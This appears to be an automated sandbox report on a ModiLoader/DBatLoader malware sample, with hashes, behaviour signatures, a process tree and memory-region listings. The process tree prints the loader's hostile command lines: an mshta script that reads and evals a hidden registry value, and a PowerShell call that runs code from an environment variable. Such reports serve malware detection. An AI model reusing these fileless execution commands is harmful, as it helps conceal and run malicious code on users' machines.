Analysis

  • max time kernel
    92s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11/10/2022, 17:40

General

  • Target

    cce692589e434424f5f0c309adf0d8437e6f179388473393f16d37b18f9bf570.exe

  • Size

    411KB

  • MD5

    61791ef56847f2952fffd291239f9590

  • SHA1

    679bee14e08b2026ca127ff5074cd241274ff0aa

  • SHA256

    cce692589e434424f5f0c309adf0d8437e6f179388473393f16d37b18f9bf570

  • SHA512

    994d468938e734a7d86d58c1026c1d677dd289907d41ba9c1b15507aebae371461074917a79620e733f0b5cb862750d1d97495d6608f1875414631258e00aaae

  • SSDEEP

    6144:lWpOiBvmmlmj1LvnmvBsK35IgGhI56nJe5cNgz4Cu1fhCKgteB1YCt7:lWp/Bvm0c9vnmv73i9hI56aJu1fhCKgo

Score
10/10

Malware Config

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • ModiLoader Second Stage 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\cce692589e434424f5f0c309adf0d8437e6f179388473393f16d37b18f9bf570.exe
    "C:\Users\Admin\AppData\Local\Temp\cce692589e434424f5f0c309adf0d8437e6f179388473393f16d37b18f9bf570.exe"
    1⤵
      PID:2120
    • C:\Windows\system32\mshta.exe
      "C:\Windows\system32\mshta.exe" javascript:tZlaPR8="AnjT1RlP3m";iw3=new%20ActiveXObject("WScript.Shell");HfAxwz2y="Y";vM56GE=iw3.RegRead("HKLM\\software\\Wow6432Node\\aBQxKY\\n2GwoAoOE");Q3h6MQIydE="YFy1CD";eval(vM56GE);unON5bC6="X3yZYnHT";
      1⤵
      • Process spawned unexpected child process
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:1432
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:jlay
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3076

    Network

          MITRE ATT&CK Enterprise v6

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • memory/2120-132-0x0000000002390000-0x00000000023C4000-memory.dmp

            Filesize

            208KB

          • memory/2120-133-0x0000000000400000-0x000000000046A000-memory.dmp

            Filesize

            424KB

          • memory/2120-135-0x0000000000060000-0x0000000000120000-memory.dmp

            Filesize

            768KB

          • memory/2120-146-0x0000000000060000-0x0000000000120000-memory.dmp

            Filesize

            768KB

          • memory/2120-145-0x0000000002390000-0x00000000023C4000-memory.dmp

            Filesize

            208KB

          • memory/3076-139-0x00000000056A0000-0x00000000056C2000-memory.dmp

            Filesize

            136KB

          • memory/3076-138-0x0000000005790000-0x0000000005DB8000-memory.dmp

            Filesize

            6.2MB

          • memory/3076-140-0x0000000005E70000-0x0000000005ED6000-memory.dmp

            Filesize

            408KB

          • memory/3076-141-0x0000000005EE0000-0x0000000005F46000-memory.dmp

            Filesize

            408KB

          • memory/3076-142-0x0000000006440000-0x000000000645E000-memory.dmp

            Filesize

            120KB

          • memory/3076-143-0x0000000007C80000-0x00000000082FA000-memory.dmp

            Filesize

            6.5MB

          • memory/3076-144-0x0000000006950000-0x000000000696A000-memory.dmp

            Filesize

            104KB

          • memory/3076-137-0x0000000002D60000-0x0000000002D96000-memory.dmp

            Filesize

            216KB